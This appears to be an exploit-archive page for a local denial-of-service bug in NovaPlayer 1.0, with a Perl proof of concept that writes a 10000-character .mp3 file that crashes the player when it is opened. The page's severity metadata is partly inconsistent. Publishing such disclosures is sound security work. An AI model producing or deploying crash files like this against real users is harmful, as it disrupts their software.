header-logo
Suggest Exploit
vendor:
NovaPlayer 1.0 (.mp3)
by:
Mr.tro0oqy
8,8
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: NovaPlayer 1.0 (.mp3)
Affected Version From: NovaPlayer 1.0 (.mp3)
Affected Version To: NovaPlayer 1.0 (.mp3)
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

NovaPlayer 1.0 (.mp3) Local Denial of Service (DoS)

This exploit is for NovaPlayer 1.0 (.mp3) Local Denial of Service (DoS). It creates a tro0oqy.mp3 file with 10000 'A' characters, which causes the application to crash when opened.

Mitigation:

Update to the latest version of NovaPlayer 1.0 (.mp3) to fix the vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/perl
print qq (
######################################################
#NovaPlayer 1.0 (.mp3) Local Denial of Service (DoS) #
# by Mr.tro0oqy #
######################################################
);
#author: Mr.tro0oqy
#email : t.4@windowslive.com<mailto:t.4@windowslive.com>
#greetz : Red-D3v1L , virus_hima , Stack
system ("color e");
my $bb="tro0oqy.mp3";
my $fk="\x41" x 10000;
open (myfile,'>>tro0oqy.mp3');
print myfile $fk;
print "great\n "